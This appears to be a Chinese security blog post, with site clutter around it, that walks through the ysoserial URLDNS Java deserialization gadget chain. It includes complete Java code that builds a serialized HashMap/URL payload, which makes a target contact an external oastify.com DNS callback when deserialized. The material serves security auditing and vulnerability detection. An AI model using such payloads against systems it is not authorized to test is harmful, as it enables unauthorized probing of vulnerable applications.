java代码审计之URLDNS

最新推荐文章于 2024-06-12 23:05:18 发布
最新推荐文章于 2024-06-12 23:05:18 发布
阅读量362 收藏 7
点赞数 5
分类专栏: java代码审计 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CheatMyself/article/details/139074660
版权

java代码审计之URLDNS

URLDNS利用 Java 中 java.net.URL 类的特性,生成一个仅触发 DNS 请求的序列化负载。这个利用链非常适合用于检测和验证 Java 应用程序是否存在反序列化漏洞,因为它不限制jak版本,使用JAVA内置类,对第三方依赖没有要求,并且不会执行任意代码,只会触发 DNS 请求,从而降低测试过程中的风险。

1. git地址

ysoserial/src/main/java/ysoserial/payloads/URLDNS.java at master · frohoff/ysoserial · GitHub

2. 工具链如下:

image-20240519193524539

3. 工具链分析

new UEL()—>URL.hashCode(),如果hashCode=-1,则重新计算hashCode

image-20240519213531663

如果hashCode=-1,则通过以下函数获取IP地址。

image-20240520073926002

接下来分析哪里调用URL.hashCode函数,new HashMap(),进入HashMap函数,查找到readObject(在进行反序列化时会调用readObject()方法),在从readObject中发现,hash(key),

image-20240520081324345

当key!=null时,key的类型为URL,hashCode=-1 会调用hashCode函数,从而触发DNSURL地址。

序列化:

package org.example;

import java.io.*;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

//TIP To <b>Run</b> code, press <shortcut actionId="Run"/> or
// click the <icon src="AllIcons.Actions.Execute"/> icon in the gutter.
public class Main {
    public static void serizlizable(String path,Object obj) throws Exception {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream(path));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserizlizable(String path) throws Exception {
        ObjectInputStream objectIutputStream = new ObjectInputStream(new FileInputStream(path));
        return objectIutputStream.readObject();
    }

    public static void main(String[] args) throws Exception {
        URL url = new URL("http://r4wbxk090bj0gdzd3jipls77qywpkf84.oastify.com");
        Field hashCode = URL.class.getDeclaredField("hashCode");
        hashCode.setAccessible(true);
        hashCode.setInt(url,12);
        HashMap<URL, Object> map = new HashMap<>();
        map.put(url,null);
        hashCode.setInt(url,-1);
        serizlizable("url.txt",map);
    }
}

反序列化,触发DNSlog请求

public static void main(String[] args) throws Exception {
       unserizlizable("url.txt");
    }

image-20240520205025531

able(“url.txt”);
}


[外链图片转存中...(img-dnPMnhY4-1716209546048)]
ZZ58
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java代码审计常规思路和方法
12-22
java代码审计常规思路和方法
Java代码审计案例及修复
12-22
Java代码审计案例及修复
Java代码审计13之URLDNS
划水的小白白
08-22 422
1、简介urldns链 2、hashmap与url类的分析 2.1、Hashmap类readObject方法的跟进 2.2、URL类hashcode方法的跟进 2.3、InetAddress类的getByName方法 3、整个链路的分析 3.1、整理上述的思路 3.2、一些疑问的测试 3.3、hashmap的put方法分析 3.4、反射 3.5、整个代码 4、补充说明
Java 代码审计——Fastjson与java.net.URL
王嘟嘟的博客
02-14 419
在整理历史内容的时候,突然发现一个问题,为什么可以通过就可以判断版本是大于1.2.36可以简单看看。
Java代码审计——LDAP
王嘟嘟的博客
02-14 2584
0x00 前言 反序列化总纲 对LDAP笔记进行整理和总结 0x01 LDAP基础 1、基础知识 LDAP(Lightweight Directory Access Protocol)轻量目录访问协议,主要用于访问目录服务 用户进行连接、查询、更新远程服务器上的目录。 目录服务:一个特殊的数据库,用来保存描述性的、基于属性的详细信息,支持过滤功能。 目录:一个为查询、浏览和搜索而优化的数据库,树状结构 2、基本模型 2.1 目录树 整个目录信息集都可以是一个目录信息树,树中的每一个节点都是一个条目 条目:
JAVA代码审计之SQL注入
06-14
本章节课程主要从以下三方面详细的介绍了如何针对java代码中sql注入的审计方法及黑盒验证: 1、JDBC连接方式下sql注入的存在的形态及修复方法,like、in情况在如何安全使用预处理来防范sql注入 2、在使用Mybatis框架...
Java代码审计(入门篇).pdf
10-21
Java代码审计(入门篇) 本书《Java代码审计(入门篇)》是一本系统、全面、实战的Java代码审计入门图书,旨在帮助Java开发人员快速掌握Java代码安全审计技巧。全书从浅入深地介绍了Java代码审计的流程、Java Web...
java代码审计之租车系统1
08-03
1.下载源代码 如文件中的zxzcxt.zip 2.阅读源代码中的使用说明书就ok,注意的是,将sql导入mysql的过程中需要先创建databases. 3.
Java代码审计15之Apache log4j2漏洞
划水的小白白
08-31 1270
1、log4j简介 2、复现 2.1、高版本测试 2.2、测试代码 2.3、补充之dns探测 2.3.1、rmi、ldap也可以dnslog探测 2.3.2、dnslog外带信息 3、漏洞原理 3.1、漏洞的危害大的背景 3.2、具体的代码调试 4、靶场测试 4.1、dns探测 4.2、工具下载与使用 4.3、测试 4.4、手工可以测出,部分扫描器扫不到 5、bypass
java代码审计 URLDNS
weixin_50217210的博客
02-27 334
而正是因为在HashMap中,Entry的存放位置是根据Key的Hash值来计算,然后存放到数组中的。所以对于同一个Key,在不同的JVM实现中计算得出的Hash值可能是不同的。我们发现了URL类,它有一个有趣的特点,就是当执行hashCode方法时会触发当前URLStreamHandler的hashCode方法。前面主要是使用的一些防止数据不一致的方法,我们可以忽视。URLDNS链是java原生态的一条利用链,通常用于存在反序列化漏洞进行验证的,因为是原生态,不存在版本限制。
Java02】Java中数组的定义与初始化
饮冰室
06-10 581
推荐第一种方式。这种方式容易让人理解,数据类型是type[],对象名称是arrayName。第二种方式有些老旧了。由于数组是一种引用变量(也就是一个指针),所以定义的时候还没有指向任何有效的内存空间,因此在定义数组的时候不能指定数组的长度,也不能直接使用。必须进行初始化。可以使用var让系统自动推断变量类型,既可以用于静态初始化,也可以用于动态初始化。
【2024最新华为OD-C/D卷试题汇总】[支持在线评测] CPU算力分配(100分) - 三语言AC题解(Python/Java/Cpp)
清隆学长的博客
06-11 358
### 问题描述 K小姐是某公司运营部门的主管,最近她需要对公司的两组服务器进行算力分配。每组服务器有多个算力不同的 $CPU$,其中 $A$ 组第 $i$ 个 $CPU$ 的运算能力为 $A[i]$,而 $B$ 组第 $i$ 个 $CPU$ 的运算能力为 $B[i]$。一组服务器的总算力是各 $CPU$ 的算力之和。 为了让两组服务器的算力相等,K小姐允许从每组各选出一个 $CPU$ 进行一次交换。她希望从 $A$ 组服务器中选出算力尽可能小的 $CPU$ 来交换,你能帮她计算出应该选择哪两个 $CP
微型操作系统内核源码详解系列四(3):操作系统调度算法(FreeRTOS内核篇上)
最新发布
2301_77061352的博客
06-12 808
-uxTopPriority,被设定为是代表最大优先级的数字,自减操作代表从就绪列表最后一个链表(优先级最高的链表)开始查找,直到找到任务链表不为空的优先级任务,那么这个任务肯定也是所有任务中优先级最大的任务,然后获取这个任务的TCB并更新pxCurrentTCB(切换的具体函数),最后更新uxTopReadyPriority的值。容笔者说一下个人看法,从c语言和数据结构算法的层面学习,只能说是舍本逐末,透过Freertos这个小型系统,窥见庞大的操作系统架构的一角,这才是我们学习的重点。
Invalid keystore format,获取安全码SHA1值出错
yfy1907的博客
06-11 190
Invalid keystore format 错误
从零手写实现 nginx-20-placeholder 占位符 $
06-12 1125
大家好,我是老马。很高兴遇到你。我们为 java 开发者实现了 java 版本的 nginx如果你想知道 servlet 如何处理的,可以参考我的另一个项目:手写从零实现简易版 tomcatminicat除了内置变量,Nginx 还允许用户自定义变量。自定义变量可以在set指令中定义。在这个例子中,定义了一个自定义变量,其值为,并在响应中返回这个值。Nginx 支持占位符的主要目的是提供更高的灵活性和动态性,使其能够适应各种复杂的应用场景和需求。
【Hydro】SCS-CN方法中径流曲线数的确定(下)
```On Earth, Be Water, By Coding```
06-11 91
在[【Hydro】SCS-CN方法中径流曲线数的确定(上)](https://blog.csdn.net/qq_25262697/article/details/133796329)中已经介绍了SCS-CN在SWAT和HMS中的应用,以下会补充SCS-CN在XPSWMM、InfoWorks ICM中的应用。以及使用软件计算SCS-CN的步骤。
eclipse插件开发中,获取一个java工程中的所有import的包名,并打印出来
liudong200618的博客
06-11 201
这段代码将遍历指定Java工程中的所有源代码文件,并打印出每个文件中的所有import语句。确保在开发Eclipse插件时,你的插件项目已经正确配置了对Eclipse JDT的依赖。
【使用ObjectSizeCalculator计算对象内存大小】
歪比巴卜
06-12 164
使用ObjectSizeCalculator计算对象内存大小的总结
springboot连接多个库
sunyingboaini的博客
06-11 203
一个SpringBoot项目,同时连接两个数据库:比如一个是Mysql数据库,一个是oracle数据库(啥数据库都一样,连接两个同为oracle的数据库,或两个不同的数据库,只需要更改对应的driver-class-name和jdbc-url等即可)注意:连接什么数据库,要引入对应数据库的包。
Java代码审计常见问题
05-28
Java代码审计中常见的问题包括: 1. SQL注入:当程序没有对输入数据进行验证或过滤时,攻击者可以通过输入恶意SQL语句来执行非法的数据库操作,例如删除、修改、查询等。在Java代码审计中,需要检查程序是否正确的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值